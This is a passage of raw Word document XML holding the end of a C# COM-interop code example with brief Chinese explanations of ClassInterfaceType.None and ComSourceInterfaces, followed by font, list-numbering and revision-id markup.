          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            catch(Exception e)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                MessageBox.Show(e.Message);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        } </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解释一下：ClassInterfaceType.None表示,这个类不会产生类接口.如果没有显式的接口实现,那么这个类只能提供对IDispatch的访问.用户期待通过接口导出该类显式实现了的成员.所以需要使用设置ClassInterfaceAttribute.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ComSourceInterfaces(typeof(DBCOM_Events))]标明标记的这个类会把接口暴露给COM事件源.在我们的例子中,没有什么需要暴露的..</w:t>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FZBSK--GBK1-0">
    <w:altName w:val="Times New Roman"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>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新宋体">
    <w:panose1 w:val="02010609030101010101"/>
    <w:charset w:val="86"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000283" w:usb1="288F0000" w:usb2="00000006" w:usb3="00000000" w:csb0="00040001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Helvetica Neue">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swiss"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="E1002EFF" w:usb1="C000605B" w:usb2="00000029" w:usb3="00000000" w:csb0="200101FF" w:csb1="20280000"/>
  </w:font>
  <w:font w:name="Helvetica">
    <w:altName w:val="Arial"/>
    <w:panose1 w:val="020B0504020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Monaco">
    <w:altName w:val="Courier New"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>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7808A6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="857808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9659129"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8965912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CA154AE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8CA154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3C339C7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="93C339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94F46D8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="994F46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9BFFEEAA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9BFFEE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9E0AC3ED"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9E0AC3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9FFC6D34"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9FFC6D3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A9D41F65"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A9D41F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AFD86D63"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AFD86D63"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsiaTheme="minorEastAsia"/>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BCD0E8E9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BCD0E8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BFA889E6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BFA889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CBF0934B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CBF093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CCCAA0F4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CCCAA0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CE2007E2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CE2007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E2B3F4C8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E2B3F4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F5C3F848"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F5C3F8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FAB25631"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FAB256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FE458BF5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FE458B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002AA58E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="002AA5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032BF817"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="032BF8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032D0EF6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="032D0E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0422313C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="042231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059D779C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="059D77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066B4DE4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="066B4D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0716001D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0716001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094F5ED5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="094F5ED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0F141F8D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0F141F8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132F2A52"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="132F2A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13513720"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="135137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166FCE57"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="166FCE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17D9C738"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="17D9C7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18D733CB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="18D733C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3">
    <w:nsid w:val="1D00806C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1D0080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202C62D2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="202C62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24356C84"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="24356C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290FF877"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="290FF8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2E564F76"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2E564F7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32534FB0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="32534FB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9">
    <w:nsid w:val="325A653A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="325A653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0">
    <w:nsid w:val="3265AD81"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="3265AD81"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="41">
    <w:nsid w:val="3365A987"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3365A9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
    <w:nsid w:val="34084779"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="34084779"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="450" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="微软雅黑" w:cs="Arial"/>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347E74BA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="347E74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34DAC83F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="34DAC83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35B5E4E7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="35B5E4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377C9A98"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="377C9A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7">
    <w:nsid w:val="38B460E2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="38B460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3BF24117"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3BF241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3D9A059B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3D9A059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0">
    <w:nsid w:val="3FF5D49F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3FF5D4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479B55E0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="479B55E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2">
    <w:nsid w:val="4AB846E4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4AB846E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3">
    <w:nsid w:val="4C3E345C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4C3E345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4C756FAB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4C756FA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4F3F77BF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4F3F77B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5231649A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="523164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59391A04"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="59391A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
    <w:nsid w:val="5A4C6FA5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5A4C6FA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9">
    <w:nsid w:val="5A4FAB1A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5A4FAB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0">
    <w:nsid w:val="5AAB6F83"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5AAB6F83"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="61">
    <w:nsid w:val="5D204D92"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5D204D9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2">
    <w:nsid w:val="5D443934"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5D44393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3">
    <w:nsid w:val="600442D7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="600442D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4">
    <w:nsid w:val="60D77351"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="60D7735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5">
    <w:nsid w:val="61471FB5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="61471FB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6">
    <w:nsid w:val="639186A0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="639186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
    <w:nsid w:val="653D1365"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="653D1365"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>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8">
    <w:nsid w:val="665F046B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="665F046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9">
    <w:nsid w:val="69314723"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6931472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0">
    <w:nsid w:val="6A042BEB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6A042B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1">
    <w:nsid w:val="6A434F99"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6A434F99"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b w:val="0"/>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2">
    <w:nsid w:val="6C7508CD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6C7508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3">
    <w:nsid w:val="6D1B7B81"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6D1B7B8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4">
    <w:nsid w:val="6DEB2301"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6DEB2301"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2、"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>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5">
    <w:nsid w:val="6ED375FD"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6ED375FD"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="76">
    <w:nsid w:val="70E420E8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="70E420E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7">
    <w:nsid w:val="7A1CE74A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7A1CE7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8">
    <w:nsid w:val="7BAD69E7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7BAD69E7"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:color w:val="0070C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9">
    <w:nsid w:val="7E1D9B84"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7E1D9B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0">
    <w:nsid w:val="7FFE1E02"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7FFE1E0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9"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="60"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="75"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="70"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="79"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="7"/>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8"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="65"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="69"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="71"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="63"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="53"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="54"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="61"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="51"/>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6"/>
  </w:num>
  <w:num w:numId="42">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="43">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="44">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="45">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="46">
    <w:abstractNumId w:val="74"/>
  </w:num>
  <w:num w:numId="47">
    <w:abstractNumId w:val="72"/>
  </w:num>
  <w:num w:numId="48">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="49">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="50">
    <w:abstractNumId w:val="78"/>
  </w:num>
  <w:num w:numId="51">
    <w:abstractNumId w:val="62"/>
  </w:num>
  <w:num w:numId="52">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="5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31"/>
  </w:num>
  <w:num w:numId="6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43"/>
  </w:num>
  <w:num w:numId="65">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="66">
    <w:abstractNumId w:val="80"/>
  </w:num>
  <w:num w:numId="67">
    <w:abstractNumId w:val="67"/>
  </w:num>
  <w:num w:numId="68">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6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0"/>
  </w:num>
  <w:num w:numId="7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39"/>
  </w:num>
  <w:num w:numId="81">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="8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45"/>
  </w:num>
  <w:num w:numId="8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1"/>
  </w:num>
  <w:num w:numId="10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8"/>
  </w:num>
  <w:num w:numId="10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6"/>
  </w:num>
  <w:num w:numId="110">
    <w:abstractNumId w:val="66"/>
  </w:num>
  <w:num w:numId="111">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46"/>
  </w:num>
  <w:num w:numId="11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11"/>
  </w:num>
  <w:num w:numId="1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6"/>
  </w:num>
  <w:num w:numId="1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3"/>
  </w:num>
  <w:num w:numId="123">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="1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14"/>
  </w:num>
  <w:num w:numId="1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59"/>
  </w:num>
  <w:num w:numId="13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32"/>
  </w:num>
  <w:num w:numId="14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47"/>
  </w:num>
  <w:num w:numId="153">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="154">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="155">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="1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68"/>
  </w:num>
  <w:num w:numId="161">
    <w:abstractNumId w:val="76"/>
  </w:num>
  <w:num w:numId="162">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="163">
    <w:abstractNumId w:val="55"/>
  </w:num>
  <w:num w:numId="164">
    <w:abstractNumId w:val="57"/>
  </w:num>
  <w:num w:numId="165">
    <w:abstractNumId w:val="52"/>
  </w:num>
  <w:num w:numId="166">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="16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50"/>
  </w:num>
  <w:num w:numId="17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4"/>
  </w:num>
  <w:num w:numId="17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abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="1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17"/>
  </w:num>
  <w:num w:numId="18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abstractNumId w:val="77"/>
  </w:num>
  <w:num w:numId="188">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="189">
    <w:abstractNumId w:val="73"/>
  </w:num>
  <w:num w:numId="190">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="191">
    <w:abstractNumId w:val="64"/>
  </w:num>
  <w:num w:numId="1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hideSpellingErrors/>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54B"/>
    <w:rsid w:val="00000847"/>
    <w:rsid w:val="000013B6"/>
    <w:rsid w:val="00001B4C"/>
    <w:rsid w:val="000028EC"/>
    <w:rsid w:val="00005769"/>
    <w:rsid w:val="00007B0E"/>
    <w:rsid w:val="00010028"/>
    <w:rsid w:val="00010489"/>
    <w:rsid w:val="00012862"/>
    <w:rsid w:val="00014858"/>
    <w:rsid w:val="00015AE8"/>
    <w:rsid w:val="00021788"/>
    <w:rsid w:val="000229B5"/>
    <w:rsid w:val="00024BD2"/>
    <w:rsid w:val="00026D68"/>
    <w:rsid w:val="00026F46"/>
    <w:rsid w:val="00031509"/>
    <w:rsid w:val="00032304"/>
    <w:rsid w:val="00032F3F"/>
    <w:rsid w:val="00037A45"/>
    <w:rsid w:val="00040301"/>
    <w:rsid w:val="00051B65"/>
    <w:rsid w:val="00052E8A"/>
    <w:rsid w:val="0005520C"/>
    <w:rsid w:val="000602F3"/>
    <w:rsid w:val="00062253"/>
    <w:rsid w:val="00062B11"/>
    <w:rsid w:val="00063F86"/>
    <w:rsid w:val="000647D0"/>
    <w:rsid w:val="00064D3B"/>
    <w:rsid w:val="00066703"/>
    <w:rsid w:val="00066F3F"/>
    <w:rsid w:val="00066F64"/>
    <w:rsid w:val="000676C9"/>
    <w:rsid w:val="00073295"/>
    <w:rsid w:val="00074524"/>
    <w:rsid w:val="00075497"/>
    <w:rsid w:val="00076A0F"/>
    <w:rsid w:val="00081FB0"/>
    <w:rsid w:val="00082AED"/>
    <w:rsid w:val="00083EB3"/>
    <w:rsid w:val="00084101"/>
    <w:rsid w:val="00085227"/>
    <w:rsid w:val="000856F4"/>
    <w:rsid w:val="00086A6B"/>
    <w:rsid w:val="00087CEC"/>
    <w:rsid w:val="00093FA8"/>
    <w:rsid w:val="00093FDB"/>
    <w:rsid w:val="00094201"/>
    <w:rsid w:val="00094489"/>
    <w:rsid w:val="0009631F"/>
    <w:rsid w:val="00097958"/>
    <w:rsid w:val="000A0E1E"/>
    <w:rsid w:val="000A1E66"/>
    <w:rsid w:val="000A217E"/>
    <w:rsid w:val="000A7774"/>
    <w:rsid w:val="000A7AC3"/>
    <w:rsid w:val="000A7BBD"/>
    <w:rsid w:val="000B0AFE"/>
    <w:rsid w:val="000B131F"/>
    <w:rsid w:val="000B1A13"/>
    <w:rsid w:val="000B55F2"/>
    <w:rsid w:val="000B697A"/>
    <w:rsid w:val="000C123E"/>
    <w:rsid w:val="000C2F5C"/>
    <w:rsid w:val="000C4D18"/>
    <w:rsid w:val="000C58C8"/>
    <w:rsid w:val="000C5982"/>
    <w:rsid w:val="000C69CE"/>
    <w:rsid w:val="000C74E3"/>
    <w:rsid w:val="000C7B03"/>
    <w:rsid w:val="000D0218"/>
    <w:rsid w:val="000D1067"/>
    <w:rsid w:val="000D1B6F"/>
    <w:rsid w:val="000D37F9"/>
    <w:rsid w:val="000D3855"/>
    <w:rsid w:val="000D58AA"/>
    <w:rsid w:val="000D69EA"/>
    <w:rsid w:val="000D7A47"/>
    <w:rsid w:val="000D7BC6"/>
    <w:rsid w:val="000D7CA8"/>
    <w:rsid w:val="000E1C88"/>
    <w:rsid w:val="000E3BCB"/>
    <w:rsid w:val="000E3FE0"/>
    <w:rsid w:val="000E40FD"/>
    <w:rsid w:val="000E4B9A"/>
    <w:rsid w:val="000E4EAA"/>
    <w:rsid w:val="000E6676"/>
    <w:rsid w:val="000E6CC2"/>
    <w:rsid w:val="000E7759"/>
    <w:rsid w:val="000E7857"/>
    <w:rsid w:val="000F1A6D"/>
    <w:rsid w:val="000F2B37"/>
    <w:rsid w:val="000F30B2"/>
    <w:rsid w:val="000F4476"/>
    <w:rsid w:val="000F5A09"/>
    <w:rsid w:val="000F7E32"/>
    <w:rsid w:val="00102796"/>
    <w:rsid w:val="00107C66"/>
    <w:rsid w:val="00110B79"/>
    <w:rsid w:val="001112F4"/>
    <w:rsid w:val="00112E9C"/>
    <w:rsid w:val="00115B1A"/>
    <w:rsid w:val="00116562"/>
    <w:rsid w:val="001171B2"/>
    <w:rsid w:val="0012071A"/>
    <w:rsid w:val="001220ED"/>
    <w:rsid w:val="00124DD9"/>
    <w:rsid w:val="00125AA0"/>
    <w:rsid w:val="00126C2E"/>
    <w:rsid w:val="001300E7"/>
    <w:rsid w:val="0013287C"/>
    <w:rsid w:val="00132A4A"/>
    <w:rsid w:val="0013389B"/>
    <w:rsid w:val="00134391"/>
    <w:rsid w:val="00135D25"/>
    <w:rsid w:val="001365B7"/>
    <w:rsid w:val="001400CB"/>
    <w:rsid w:val="001416B5"/>
    <w:rsid w:val="00141E44"/>
    <w:rsid w:val="00143787"/>
    <w:rsid w:val="00146B53"/>
    <w:rsid w:val="00146DD8"/>
    <w:rsid w:val="00147A3D"/>
    <w:rsid w:val="001517B0"/>
    <w:rsid w:val="00156F7E"/>
    <w:rsid w:val="001573AB"/>
    <w:rsid w:val="001578D6"/>
    <w:rsid w:val="00157D3D"/>
    <w:rsid w:val="00160119"/>
    <w:rsid w:val="0016075D"/>
    <w:rsid w:val="00160EBC"/>
    <w:rsid w:val="00163C0A"/>
    <w:rsid w:val="00163D23"/>
    <w:rsid w:val="00163F73"/>
    <w:rsid w:val="001644A0"/>
    <w:rsid w:val="0016556E"/>
    <w:rsid w:val="001665DB"/>
    <w:rsid w:val="00167E78"/>
    <w:rsid w:val="00171323"/>
    <w:rsid w:val="001729DA"/>
    <w:rsid w:val="00172A27"/>
    <w:rsid w:val="00173413"/>
    <w:rsid w:val="00174AC8"/>
    <w:rsid w:val="00175E35"/>
    <w:rsid w:val="0017616C"/>
    <w:rsid w:val="001775D4"/>
    <w:rsid w:val="00177D58"/>
    <w:rsid w:val="00177DA5"/>
    <w:rsid w:val="00180C2C"/>
    <w:rsid w:val="00180D92"/>
    <w:rsid w:val="00181FBC"/>
    <w:rsid w:val="00182000"/>
    <w:rsid w:val="00183DA6"/>
    <w:rsid w:val="001840EB"/>
    <w:rsid w:val="00184616"/>
    <w:rsid w:val="00185629"/>
    <w:rsid w:val="00190E06"/>
    <w:rsid w:val="001944AD"/>
    <w:rsid w:val="001948B4"/>
    <w:rsid w:val="001A0AD7"/>
    <w:rsid w:val="001A0D4E"/>
    <w:rsid w:val="001A2724"/>
    <w:rsid w:val="001A2FA5"/>
    <w:rsid w:val="001A4BDF"/>
    <w:rsid w:val="001A5C8B"/>
    <w:rsid w:val="001A6278"/>
    <w:rsid w:val="001A775D"/>
    <w:rsid w:val="001A7B46"/>
    <w:rsid w:val="001A7B78"/>
    <w:rsid w:val="001B07B2"/>
    <w:rsid w:val="001B39FF"/>
    <w:rsid w:val="001B3F35"/>
    <w:rsid w:val="001B4367"/>
    <w:rsid w:val="001B4EA8"/>
    <w:rsid w:val="001B6D06"/>
    <w:rsid w:val="001C071A"/>
    <w:rsid w:val="001C154D"/>
    <w:rsid w:val="001C1913"/>
    <w:rsid w:val="001C43D0"/>
    <w:rsid w:val="001C491F"/>
    <w:rsid w:val="001C6601"/>
    <w:rsid w:val="001C6817"/>
    <w:rsid w:val="001C6C20"/>
    <w:rsid w:val="001C78B8"/>
    <w:rsid w:val="001D1D0A"/>
    <w:rsid w:val="001D49CA"/>
    <w:rsid w:val="001D58EC"/>
    <w:rsid w:val="001D5BF7"/>
    <w:rsid w:val="001D7287"/>
    <w:rsid w:val="001E1A6B"/>
    <w:rsid w:val="001E3675"/>
    <w:rsid w:val="001E4A3F"/>
    <w:rsid w:val="001E5B30"/>
    <w:rsid w:val="001E6492"/>
    <w:rsid w:val="001E77C2"/>
    <w:rsid w:val="001F2B28"/>
    <w:rsid w:val="001F3E62"/>
    <w:rsid w:val="001F6A55"/>
    <w:rsid w:val="001F7AAA"/>
    <w:rsid w:val="00200FE0"/>
